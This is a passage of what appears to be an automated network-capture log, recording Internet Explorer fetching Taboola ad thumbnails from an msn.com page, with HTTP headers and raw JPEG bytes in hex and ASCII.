]5EZf_,21rvtf3aXe~`'QVU@p"A?=tl\I>'V6X"/mY[qgyM7(I=j+NXn"{}A_GYhK;,@~[6/C?B<=\ux@]4ee(n?J,e(bD[

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49849	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:55 UTC	38	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fs3.amazonaws.com%2Fshinez-pictures%2F1617177826938a14141d3bca4cb41620f72354f58c4ff.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-07 13:51:55 UTC	57	IN	HTTP/1.1 200 OK Connection: close Content-Length: 22382 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 406382820122033804965516428113552605837,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "c8b18c873b56148c17d86e406dfe23da" expiration: expiry-date="Sun, 05 Sep 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days" last-modified: Thu, 05 Aug 2021 09:50:19 GMT timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 99 x-ratelimit-reset: 1 x-envoy-upstream-service-time: 46 X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb801 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 07 Oct 2021 13:51:55 GMT Age: 3002495 X-Served-By: cache-wdc5537-WDC, cache-dca17757-DCA, cache-mxp6952-MXP X-Cache: HIT, HIT, HIT X-Cache-Hits: 1, 1, 1 X-Timer: S1633614715.279205,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fs3.amazonaws.com%2Fshinez-pictures%2F1617177826938a14141d3bca4cb41620f72354f58c4ff.jpg X-vcl-time-ms: 1
2021-10-07 13:51:55 UTC	58	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 05 00 03 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 08 00 01 02 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 06 05 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 a0 c6 c1 a4 9e 7e b2 e4 23 e0 ec fe Data Ascii: JFIF&""&0-0>>T&""&0-0>>T7"6~#
2021-10-07 13:51:55 UTC	59	IN	Data Raw: 18 d9 ea 93 8e 7a 38 aa 14 a1 f5 21 c3 d9 4d 19 14 07 e6 47 e6 5c 75 12 6c da a4 dd 3c 60 e5 9a 6a 55 a0 4b 30 27 b5 7c f8 c1 57 3e 61 a0 2d df b9 5d 8b 9c 43 af 40 ae db 96 2c e7 a4 f0 f9 e3 6b cb 67 ef 2e 43 c4 d9 ec f3 e8 80 0b 9a be 16 56 c7 ac 90 42 75 62 56 9a 6c 5d 56 f2 7a a4 43 1f 4e df a8 21 23 e6 6e 0d 90 29 04 94 65 b1 10 92 56 15 41 7c 4e 5b 2d b0 f4 26 cb c1 88 98 30 ad d4 90 94 04 f4 09 61 d8 19 d7 09 30 f6 f4 ac ae 84 39 65 fb 87 05 0d 6c 1b 35 e5 f6 1b 4e 31 0f 33 7b b2 a0 b8 35 d6 68 f1 eb 87 be 9d 2c 22 17 b9 23 65 d8 07 0e 8a 50 b7 5b d8 0b 8f fa 47 d9 53 a1 c7 fd 81 46 86 58 c2 2d 6e 2f 5a 63 c1 86 a6 3b 95 ac 1d 77 78 73 df 9f 4f 13 d6 cb 74 62 42 3a 5f 85 3e 7e 2b ce 73 be b2 44 f9 c5 cf 7d 73 8b 25 c7 73 84 1d 73 9c bc d7 5c 4b 9c Data Ascii: z8!MG\ul<`jUK0'\|W>a-]C@,kg.CVBubVl]VzCN!#n)eVA\|N[-&0a09el5N13{5h,"#eP[GSFX-n/Zc;wxsOtbB:_>~+sD}s%ss\K
2021-10-07 13:51:55 UTC	60	IN	Data Raw: 85 29 c4 4e 89 24 42 00 d0 c8 f7 b4 81 57 33 a6 4d 92 05 72 23 62 35 61 bd f2 5c 9f 2e 54 ae 10 2b 89 64 d0 b1 cc a0 16 73 45 39 a4 7c c9 52 a3 33 07 c8 22 64 96 73 f5 e6 74 4e e1 74 75 1e aa cb a2 34 a6 b3 d6 76 71 2a b1 7b e1 d9 89 95 46 82 b2 3f 50 8d 5f 6d 2e 5c 48 d5 d5 77 74 d7 75 50 e6 1e 64 23 c3 99 0a 34 44 90 d2 1a 1d 84 45 12 43 b3 85 26 a4 28 63 48 17 c7 98 20 39 dd 65 39 2d de 4c 6a b8 f7 53 2b a6 c6 01 3c 4a e6 c5 86 3a a3 5b 86 dd 1c f3 99 cd 86 3c 55 5d 66 fb 9a 31 66 5a c3 0e c3 72 bc 77 22 b2 c9 ef 51 f2 e3 3d cd 53 55 b2 5d d4 d4 4f 1b 0b 8a 99 18 25 6d 30 e2 95 a4 46 aa b2 55 b5 8a db cb 34 87 85 f1 a4 01 5a 37 74 b6 6d 08 1f 09 b0 9b 21 e2 88 42 a0 35 4e 67 5d af ae 64 5d 64 3a f3 30 ca 70 bb c7 d5 9e 16 2d 02 3f c3 9d 55 65 47 3b 56 Data Ascii: )N$BW3Mr#b5a\.T+dsE9\|R3"dstNtu4vq*{F?P_m.\HwtuPd#4DEC&(cH 9e9-LjS+<J:[<U]f1fZrw"Q=SU]O%m0FU4Z7tm!B5Ng]d]d:0p-?UeG;V
2021-10-07 13:51:55 UTC	62	IN	Data Raw: c9 68 8c bc 24 f8 ee 49 0c f3 8e 43 7b 83 26 3f 08 e9 a0 8c 8c 49 06 47 f9 37 9e 0a a3 33 7c 5c a5 ac 8e ac 54 1b d6 e6 f1 92 62 49 3b 29 a5 99 83 46 31 f8 3e 53 44 08 13 a3 4a b3 8d 69 55 39 3c a2 d9 a3 0a a8 d7 23 7c d5 39 54 46 bf cb 85 5e 90 88 8b f5 d7 b5 13 85 e9 a6 e7 ae 51 3a e7 94 54 5e ac f1 f8 57 91 8b 08 ec ed d6 9a 4e 1d af 2f b1 f2 0a 2c e6 a7 8f 28 a6 11 06 9f c4 e7 bd 89 fc 2f 6c d9 cc 7b 95 c5 7a d7 df 8d 01 77 5b 37 4a 6a 09 e2 2b a3 63 13 f4 80 e0 ac 17 51 66 c6 c1 b6 f4 13 fc 48 99 0d 94 5d a7 57 1c 63 b8 c1 e3 6c cc 66 9a 77 a6 7c ea 4c de ac f0 42 8c 38 24 ba 47 1e 82 7b 4a 9f 4f 1d 70 06 f6 7d b2 9f 01 55 ad 3c 88 d9 24 9c 13 21 6f 0a 0b e4 c7 36 0d 77 fc 68 c1 bc d9 75 8f f2 35 48 b6 9e 4b 5d e4 c9 b1 1b bf 28 d8 e6 b2 4c ba cd ad Data Ascii: h$IC{&?IG73\|\TbI;)F1>SDJiU9<#\|9TF^Q:T^WN/,(/l{zw[7Jj+cQfH]Wclfw\|LB8$G{JOp}U<$!o6whu5HK](L
2021-10-07 13:51:55 UTC	63	IN	Data Raw: 45 54 6b 1a 45 e7 f8 78 22 7f 64 45 ff 00 1c af 1d 79 2f 3d 11 be 6a 25 f2 db f2 be 36 33 4e 43 33 25 64 43 64 b6 8b 4e 48 b8 f6 4f 29 46 c0 51 97 0a cd 84 15 33 f1 ed 3b 8e 64 94 bb 1e 04 eb 3a 80 64 14 ed 40 b9 d6 6e ca 31 94 fa 5c 91 73 0c 35 8d 5f 2c b9 f9 de 06 c5 44 76 64 ed 8b ae 18 9c bb 36 7e d7 d5 c2 54 e7 33 5d c7 ab 1b f4 b9 63 f7 4e a7 1a a7 af 28 76 f2 d5 22 e7 fe fc fe e0 35 80 ff 00 f9 8f ee 23 59 a2 a7 8b 0d dc 66 0c e7 f2 95 e5 ee 2f 0a 5f 05 6d 3b fb 96 c3 9b cf 86 3a fe e6 f1 af 3e 5b 8b bf b9 ba 64 54 51 62 8f ee 76 b5 3f a3 0a ff 00 aa 17 f3 e2 2c 35 9d c8 e4 47 7a a4 7c 1f f7 f3 b1 9e a8 e8 d8 2b b7 3e e5 91 e0 a2 c1 53 68 6f f9 42 78 9b 86 c6 cc bb 89 e1 cb 1b 15 4b fe ea 0e c4 68 29 bd bd dc 4a 67 4d aa ee c5 ff 00 6e bc 8f a0 33 Data Ascii: ETkEx"dEy/=j%63NC3%dCdNHO)FQ3;d:d@n1\s5_,Dvd6~T3]cN(v"5#Yf/_m;:>[dTQbv?,5Gz\|+>ShoBxKh)JgMn3
2021-10-07 13:51:55 UTC	64	IN	Data Raw: 21 98 4d 74 70 cc c1 61 31 eb 03 12 16 c6 9d 1d ca da b2 58 65 d7 d6 c9 ec 95 68 29 e8 df 34 20 cb 61 14 8e 77 8f 46 b3 ab 0f 1c 28 2c e0 3c a8 ef 85 0a 92 15 ac 1f f6 bd 3b 18 b4 27 93 3c 45 4c f8 8e 2f ca 6b e1 8d 8b e4 26 2d 7b 9e 34 7a 74 f8 3e b5 fb e9 a2 17 c7 23 9c a1 88 e3 22 a7 83 a1 3d 11 1e fe 8a 34 62 f1 d5 75 4b e5 40 99 34 86 28 c8 03 28 ca c8 41 92 e7 c2 48 bd 0c 03 60 d5 83 ad 1d a1 23 c9 92 f6 3c f3 a1 b9 ff 00 25 ca b7 66 22 3d c3 40 3a c1 e8 af 0a c8 ae 7f 0a aa 85 38 04 ac 0b de dc 8c e5 82 38 c3 49 b5 f3 aa a3 0e 4c 98 63 73 dc 8a ad 56 0d 58 c6 b9 cc 8e 95 2e f5 79 55 46 33 11 de 68 9e d6 2f d7 4f 6a aa aa f9 4b 1a f9 33 ed c1 2c a2 b8 88 65 69 c6 04 13 de f0 30 cf 47 af 47 80 bc aa 0b a8 55 c2 1b 11 ea b2 89 21 b6 27 54 ad fd 14 6f Data Ascii: !Mtpa1Xeh)4 awF(,<;'<EL/k&-{4zt>#"=4buK@4((AH`#<%f"=@:88ILcsVX.yUF3h/OjK3,ei0GGU!'To
2021-10-07 13:51:55 UTC	66	IN	Data Raw: 57 82 28 1b d5 bb 8c ee 79 04 e6 16 ba 8d 9f 51 58 d1 3a b9 f2 1b a6 01 13 c3 98 4a cb e2 7b 01 61 b3 76 56 64 2f 11 b2 42 0e e4 da 8f 0d d2 c2 e7 0b b0 45 04 dc 79 4c 8e 61 14 42 8b 0d 9c 4f 8d d4 5d 5b 38 21 07 0b da 06 c7 d6 8b e7 63 9a 1c 49 4e 64 73 38 71 73 29 d8 6c 6c 81 cc 2d 34 a9 8d f2 9c d2 4a 78 13 3c 16 01 54 a0 6b e1 e2 05 dc c0 a5 c4 ee 45 71 a7 f9 62 8d 52 61 30 b6 9b bd a7 33 ac 90 3e ea b9 84 5b 4f e2 68 ef 4d 25 d2 3c 91 b0 aa 2b 88 b8 23 18 0e 05 56 e2 82 34 4a 6b 00 b1 54 6f 65 1f 9c 43 ac d1 44 b8 8f 28 a6 b8 f6 84 0f b1 0a 55 49 d6 9c 2c 90 de de d4 2a 91 03 84 0b 43 b0 20 41 16 0a 21 b6 1d 7b a9 23 16 08 a2 6d 1b 93 88 07 55 6d 69 84 34 d3 8a 1c 26 e9 39 ed e4 28 a6 ba c5 14 e6 bb b1 07 9e 1e 07 58 a2 bc fa 2d 46 ad 58 23 6d d3 47 Data Ascii: W(yQX:J{avVd/BEyLaBO][8!cINds8qs)ll-4Jx<TkEqbRa03>[OhM%<+#V4JkToeCD(UI,*C A!{#mUmi4&9(X-FX#mG
2021-10-07 13:51:55 UTC	67	IN	Data Raw: 80 34 53 a2 ed 1c d7 06 c0 3b 64 ec 7d ae ed 10 8b a9 71 7a d7 a2 13 51 45 34 9e b4 77 a9 61 8d d0 97 56 e1 35 14 40 21 30 d9 52 80 1c 53 f9 ab 2b ff c4 00 41 11 00 02 01 03 02 03 02 08 0a 09 05 01 00 00 00 00 01 02 03 00 04 11 12 21 05 06 31 41 61 13 22 32 51 71 82 92 b1 10 14 15 16 23 42 72 81 91 a1 20 33 34 44 52 54 62 c1 d1 24 43 63 83 e1 93 ff da 00 08 01 02 01 01 3f 00 63 2c 33 46 c7 ca 03 6c 8a 92 79 24 71 29 18 60 d8 d8 57 0d b9 33 c2 09 52 30 3b 6b 50 ac 8a c8 a9 25 58 d4 b1 a8 78 95 ac c3 2a e0 0c d2 4d 1c 83 2a c0 d3 38 1d b4 f7 2e d2 f8 a3 00 30 c9 f3 54 73 eb 8c 93 d4 55 e4 ca ba 41 8f ef a7 99 a4 8b 0e 01 61 b5 5a 3a 45 30 12 82 43 2e 2a da e1 44 85 3c 51 a4 01 b5 4d c4 63 b7 90 6b 6d 98 e0 6d f9 d3 df 46 b1 eb 52 0d 4f 7b 36 94 95 76 52 70 Data Ascii: 4S;d}qzQE4waV5@!0RS+A!1Aa"2Qq#Br 34DRTb$Cc?c,3Fly$q)`W3R0;kP%XxM8.0TsUAaZ:E0C.*D<QMckmmFRO{6vRp
2021-10-07 13:51:55 UTC	68	IN	Data Raw: a9 63 91 8f 8b 1b 93 dc 09 a8 f8 6f 10 97 c9 b6 94 fa a6 97 97 38 a3 80 4a 22 0f ea 6c 54 7c af 70 df ac ba 81 47 99 4e a3 51 72 9d b6 c5 ee 26 3f 65 71 ef a8 f9 67 86 29 19 81 9c 8e d6 6f f1 51 70 4b 08 db 2b 69 6e 3d 4c 9a b3 b5 8a ce 0f 05 10 c0 d4 58 fd f5 a4 53 cb 18 38 cd 71 ab 28 38 95 e4 02 46 91 63 58 db 2c 83 27 39 a8 b8 0f 08 8f f7 79 e4 ef 66 d2 2a 2b 1b 28 ff 00 57 65 00 f4 9d 54 89 20 5d 8a 27 72 c7 8f 7e 68 46 c4 78 d2 3e 3f 0f 75 7c 5e 31 be 9c f7 9d cf e7 45 c2 63 4e d8 f3 50 97 3d 4e f4 64 c0 34 8c 0d 06 5a 12 c7 9c 6a a2 49 35 8f 37 4a 27 34 bd 2b c9 34 25 38 c9 35 af 6a 21 c9 e8 68 9c 53 31 d3 91 42 5d 80 c8 a3 21 1b 03 43 c5 6c e6 b6 ac d7 4a 32 60 56 b0 4e f4 58 76 f6 d1 99 57 48 00 d2 48 a7 a9 34 d6 d1 48 0b 09 77 cd 0b 60 aa 40 6d Data Ascii: co8J"lT\|pGNQr&?eqg)oQpK+in=LXS8q(8FcX,'9yf*+(WeT ]'r~hFx>?u\|^1EcNP=Nd4ZjI57J'4+4%85j!hS1B]!ClJ2`VNXvWHH4Hw`@m
2021-10-07 13:51:55 UTC	70	IN	Data Raw: 4d 46 18 2f bd 72 60 2d ef 61 24 09 c3 bc a5 90 00 06 11 cd 7a 41 75 7d 3b 2c 91 5b 24 51 0e a4 06 5d 86 58 9f a8 55 f8 05 80 ad 32 fe fb 58 b4 bc 96 1d 53 52 b3 89 df 4d 86 10 99 64 32 f6 91 ba a1 16 ad e4 92 7f f1 b1 08 9b 74 5b 4e 76 39 23 9c 78 60 d4 1d 62 c5 e1 3b 9b a6 ed 86 38 61 db 70 ec 0e 33 8a 8f 7a 37 ea 51 97 28 cc ca 07 2c 0f 1b 4f 88 ab 60 b0 a3 a1 8f 1b fd 82 cc 72 ae 73 94 27 91 43 51 8e cb 48 be b2 b2 b6 bd 91 de 1b 71 7c ad 13 c9 17 48 ab 23 0c 8a d4 6d 3d 30 f4 77 4f f5 6d 6e 5d 24 c0 db e6 81 e3 2e 05 c2 e7 a8 1f 1d 40 1b 2a 08 c5 1d 57 ff 00 65 5b c8 2f 4a ed 79 d6 51 bc 48 ca cc c7 27 35 71 a7 6a 6d a6 45 26 96 f7 91 89 2d 75 68 b7 a1 94 44 23 6c 90 33 b1 d1 f1 9a d1 ce 99 7a 3d 71 6d 54 4c fb 25 62 a1 f1 23 b9 22 22 a9 b4 29 ec 0d Data Ascii: MF/r`-a$zAu};,[$Q]XU2XSRMd2t[Nv9#x`b;8ap3z7Q(,O`rs'CQHq\|H#m=0wOmn]$.@*We[/JyQH'5qjmE&-uhD#l3z=qmTL%b#"")
2021-10-07 13:51:55 UTC	71	IN	Data Raw: 45 96 25 6a 4b c5 d3 75 3b c8 05 d2 b4 6c 5a 3b 59 71 d5 24 1c 05 00 fb 46 a3 b9 8c 33 20 9d 24 57 4e 0f 70 c8 48 38 f0 c1 20 d4 42 f2 df ea c4 ea eb b9 40 dc c5 5c 0d a0 8f 26 22 a3 98 49 bd 43 ae 4e 19 70 0e ce 70 41 a9 45 d4 97 04 03 93 d3 64 c1 03 b9 fa e0 8a 56 11 c8 41 6c 63 6b 11 e6 71 cd 24 db 80 1b 4e 71 c7 27 91 4a a0 16 59 11 50 9c 06 1c 6d c7 88 f2 a9 26 28 06 c0 41 04 a8 1c 64 7f 0a 57 8e 28 1e 32 31 99 47 51 0a 75 90 79 c5 bb 23 91 da 8d f8 9e ea e2 68 fd 6d 04 8f 2c 4e e5 96 79 a3 6e 32 54 64 90 70 1a ac 2d b4 f7 99 ad 5d e0 b7 b2 b0 9e 29 44 db ad 63 81 5a 09 64 71 b9 b6 85 51 b4 27 1d aa e6 ca 1d 52 2b 8b cf 58 82 64 ba 8a 25 42 91 22 6d 68 62 2a c0 b1 0c d5 04 16 da c5 de a2 92 26 a1 6e 6c 21 b7 7d 36 d6 3b 86 5e ab b9 eb 07 46 c2 11 c3 Data Ascii: E%jKu;lZ;Yq$F3 $WNpH8 B@\&"ICNppAEdVAlckq$Nq'JYPm&(AdW(21GQuy#hm,Nyn2Tdp-])DcZdqQ'R+Xd%B"mhb*&nl!}6;^F
2021-10-07 13:51:55 UTC	73	IN	Data Raw: 3b 58 30 ee 4e 47 6c d5 bc a2 48 89 ea 9b 88 d4 a9 07 04 32 b1 1d fb fb c1 ad 14 3d c2 f5 1a 18 67 69 cb 3f f4 e0 46 8f 77 bb 75 34 b1 fa bc 9d 52 5c 05 55 c7 07 0c 3d a3 51 dc 47 67 a9 34 57 ba 6c f3 3c 17 28 90 9f 62 52 bc 17 47 54 23 08 41 18 26 af b5 0d 4e 2b 3b 7b 7b fd 33 d4 5e 3b 98 65 87 f5 b7 21 64 11 2a 5c 2a 33 63 23 2c 83 03 95 ad 5b 55 f5 1b b8 9f 51 95 a2 0b 6b a5 59 dd 0d b1 a4 b2 a8 52 ce f2 12 ac d8 0b 53 5b c3 75 6f 70 d6 d7 eb 13 48 d1 cd 6e 9d 48 d5 51 33 9d f2 a8 46 ff 00 34 12 6a e7 6e 8f 6b 66 60 8a 54 8c 4a 2e 6e 6f 23 4e 83 e4 ab 4b 98 cb 30 64 4c 0c 54 51 91 2e d1 19 25 55 86 77 1c 0e 78 a8 a5 91 7a 85 70 a7 62 bb 0e 30 0f 75 14 f3 3b 42 42 c6 db 49 24 f2 de 23 27 c8 2d 13 ed 39 90 99 15 40 c6 47 db 2a 3c 38 19 ae a8 64 64 4e aa Data Ascii: ;X0NGlH2=gi?Fwu4R\U=QGg4Wl<(bRGT#A&N+;{{3^;e!d\3c#,[UQkYRS[uopHnHQ3F4jnkf`TJ.no#NK0dLTQ.%Uwxzpb0u;BBI$#'-9@G*<8ddN
2021-10-07 13:51:55 UTC	74	IN	Data Raw: dc 97 b6 d1 ad d3 d4 ee ec de 67 99 64 54 90 32 2c 6a 15 07 1c 31 ab 56 61 90 c8 b3 23 38 c7 7c ae 73 46 4c a1 5d fd f2 d1 1e 9f 3e 44 a8 52 7e 86 5c 63 b1 a4 b8 85 86 0c 53 22 ca 84 79 15 6c 8a d2 de 36 73 21 16 ca d6 27 a8 46 37 66 d8 a6 4d 7a 41 a1 cd 83 b5 04 f1 dd c3 f2 91 43 fe 2a d1 75 20 3e c5 e4 32 d9 bf e0 13 0a 9b 50 85 3b bd 84 89 75 f8 10 97 ad 4b 4d 94 9e 12 ea d9 e0 63 f7 48 05 71 f4 49 3d d2 7a 5e f7 92 22 70 c9 0c d6 d0 21 c2 82 5b ba 35 43 13 67 1d 3b 83 d0 6f c7 4a eb e6 ac 18 7d c4 51 04 7d 38 a6 00 8e 79 ad 1b 54 9b 03 75 d3 da 2a 4e 55 bf d7 47 b5 eb 5a f4 7d 88 25 52 19 fd 66 00 4f 9a 4e 0b fe 3a 5d 4f 4b ba d3 66 81 1e c6 db d5 ae a0 99 bf c5 cc 01 2c 30 ad dd 72 77 57 5f 4e b9 5b 68 65 d4 5b 4a 1d 3b d5 94 03 32 48 f3 31 e9 04 6e Data Ascii: gdT2,j1Va#8\|sFL]>DR~\cS"yl6s!'F7fMzACu >2P;uKMcHqI=z^"p![5Cg;oJ}Q}8yTuNUGZ}%RfON:]OKf,0rwW_N[he[J;2H1n
2021-10-07 13:51:55 UTC	75	IN	Data Raw: f3 b8 92 a4 0c 17 27 d9 34 e0 13 e2 31 4c 85 58 8c 1e 33 4c 7e 14 79 3d e9 9c 06 38 ca 76 2a 71 47 e1 8a 23 cb 22 8f 22 8e 4d 3a b2 b0 65 23 cc 51 e3 c7 e9 1d aa 3c 8f 10 30 29 6b 9a 66 f3 03 1c 0f 3e 68 a1 6f b2 4f 60 7e 14 ce 50 b0 0c 79 24 67 8c d3 00 1b e8 f1 ab 81 a8 bd b8 48 9e 07 31 49 83 3a 33 00 c0 8f 05 af 49 56 34 62 e0 47 2f 39 63 c9 ca bd 7a 5f f0 57 91 bf 27 af 4d 7b f1 ec 4e d5 e9 80 23 b1 f5 29 4d 7a 53 fe fe 9c e6 b5 e1 ee 7d 2b 20 fc d2 ae 1f 3d fa ba 48 3f f6 55 62 de 65 b4 76 fc c2 56 8e ff 00 d3 d3 64 15 e8 fb e7 ff 00 a4 99 3f b5 5a 07 1e 08 66 5c fe 3a d1 4f 20 8d b3 c8 3f 37 ad 3b 7e 08 62 97 c5 6b e5 a8 2d 5c 83 fc cb c8 98 56 a6 55 d7 04 2c f1 56 b6 8c 5b ea 91 13 60 7e d5 6b 58 f2 10 a1 03 f1 8a d7 61 20 f2 c9 6a 87 f3 90 d6 b5 Data Ascii: '41LX3L~y=8v*qG#""M:e#Q<0)kf>hoO`~Py$gH1I:3IV4bG/9cz_W'M{N#)MzS}+ =H?UbevVd?Zf\:O ?7;~bk-\VU,V[`~kXa j
2021-10-07 13:51:55 UTC	77	IN	Data Raw: 95 81 3f 8b d4 fc 67 06 6b a5 50 7e 3b 10 56 8f 00 f0 de f2 c8 7f e6 0a d3 90 b7 84 56 65 ff 00 ad be b5 72 a7 c6 db 4b 0b fb c4 62 bd 24 4d e0 ed 47 d4 45 a0 f9 34 8b 45 9f 96 3d 7d 54 cf 9f f8 42 4a d2 e2 f7 af 5e 53 f8 b6 51 c6 7b 47 68 9f b8 99 1a b5 39 5f c9 24 8e 35 3f f5 66 ae 66 04 90 44 b7 32 b7 f5 0a 0a b2 6c 0c 0e a2 f5 7f e6 96 ad 26 16 3d d9 6c e1 46 f9 aa 8a 45 00 e7 81 9a 41 9f 25 14 68 9f a3 ed 0f a0 ac d7 ed 1d 9a 1f 74 a7 f5 9f 80 11 5e 18 a5 51 1f 0f 27 70 00 e0 63 1f 5a a7 e0 f0 cd b7 9f b8 76 ab 2b 35 b4 ba 9a 6d c9 11 b9 2c 0a 85 c6 38 ad 47 55 05 82 95 83 65 a8 50 be e9 55 4d 4f 79 2c d2 44 88 f7 7a dc cc 72 e4 0c 6d 81 10 78 f9 d5 b1 08 cc 01 75 92 51 ff 00 5a f2 55 9c 24 0c 7b 16 d0 a7 e4 94 ca 07 60 24 7c 0f df 48 d8 ed b9 41 fd Data Ascii: ?gkP~;VVerKb$MGE4E=}TBJ^SQ{Gh9_$5?ffD2l&=lFEA%ht^Q'pcZv+5m,8GUePUMOy,DzrmxuQZU${`$\|HA
2021-10-07 13:51:55 UTC	78	IN	Data Raw: 45 19 23 b8 8b a6 54 85 90 20 7f 12 0e 47 8e 28 ee ce 0e 79 c1 1e 54 41 e7 9f ca bc 39 07 83 48 8a 41 20 9f 21 51 ec 20 e7 3d 88 a1 9c 60 01 da b3 e4 47 06 99 c1 c8 02 4c 64 0f e9 71 4c b1 26 43 31 75 e4 0e 48 e5 87 7a f6 06 03 a4 65 77 2f b8 92 70 6a 64 2c 33 d3 91 04 65 48 f3 cf 34 15 dd fd a6 67 dc 92 67 b1 1c 50 88 84 01 82 2b 1c 9e f9 3e 03 9a 46 04 fb 20 e7 24 f9 71 51 a8 70 c0 ca 15 95 55 00 e4 f8 f1 c7 34 d2 46 18 8e a4 64 72 33 ef e6 96 29 e1 70 20 2e 0f da e2 4e c0 1e dc 54 4a ac 80 18 a6 6e 9a 91 82 7c 68 f2 41 c8 c9 07 14 76 f2 09 de 0e 3e 55 24 4c 03 11 bf 05 5b 9e e2 a1 76 c2 5c 61 64 0a 02 91 c8 a4 4b 47 94 94 2f 26 d9 a6 48 ce e6 21 0e 09 51 8a 68 5e 38 c3 74 c8 3d cf bc d3 ec 23 3c e5 43 29 35 1b 80 a5 f6 aa 94 da b8 2c 73 c7 7a 03 23 39 Data Ascii: E#T G(yTA9HA !Q =`GLdqL&C1uHzew/pjd,3eH4ggP+>F $qQpU4Fdr3)p .NTJn\|hAv>U$L[v\adKG/&H!Qh^8t=#<C)5,sz#9
2021-10-07 13:51:55 UTC	79	IN	Data Raw: 00 7e ea 2a 30 70 28 91 9f 68 57 54 b6 7e d0 45 1f 13 c9 f9 03 50 c4 19 79 55 52 c4 13 e4 5a a6 68 f8 d8 d1 b0 19 e3 c7 68 52 3e 74 aa eb 0c 65 82 1e 09 55 c3 1e 47 7c 83 49 03 92 a2 36 18 6c 64 f0 c7 81 cd 2c 80 18 82 b7 24 b6 c1 c9 20 d5 c4 91 a0 01 d3 23 c0 79 13 58 63 d7 75 50 46 4f 66 c3 37 b3 e0 08 18 14 22 4f 64 30 03 3c 67 ef a3 bb 77 4c 94 18 f1 0c 54 67 b0 6d b8 26 84 d2 13 b9 10 30 55 87 24 e1 07 1c 28 35 2b 3a 45 2d c1 c9 ec bc 28 23 b8 38 6f 02 28 7a b2 b8 43 d3 1b 58 ef 27 19 0b dd 4d 4f a7 32 e4 87 b6 25 43 16 ef be 36 0c ad 5f ca 31 39 8e 37 dc a6 29 1b 73 6d 60 f9 ca e1 94 91 c5 07 80 ab 18 94 92 a1 59 47 19 19 3c 9c 92 79 c5 5a b2 e7 98 63 2c 1c 1c 64 80 ec 3b 00 41 35 d1 2c 4a ed 50 37 05 c9 3c b6 05 2c b3 42 11 79 51 b7 03 2c a7 bf 3c Data Ascii: ~*0p(hWT~EPyURZhhR>teUG\|I6ld,$ #yXcuPFOf7"Od0<gwLTgm&0U$(5+:E-(#8o(zCX'MO2%C6_197)sm`YG<yZc,d;A5,JP7<,ByQ,<

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49852	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:55 UTC	80	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F171f8b8d6097fca0bfa9b18571e0f954.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-07 13:51:55 UTC	149	IN	HTTP/1.1 200 OK Connection: close Content-Length: 11572 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 375793870887832675241171480995171816983,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "c5b7ab143a42cdf3600cfb874fc63354" expiration: expiry-date="Mon, 11 Oct 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days" last-modified: Fri, 10 Sep 2021 09:29:36 GMT timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 100 x-ratelimit-reset: 1 x-envoy-upstream-service-time: 23 X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb802 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 07 Oct 2021 13:51:55 GMT Age: 4552 X-Served-By: cache-wdc5554-WDC, cache-dca17738-DCA, 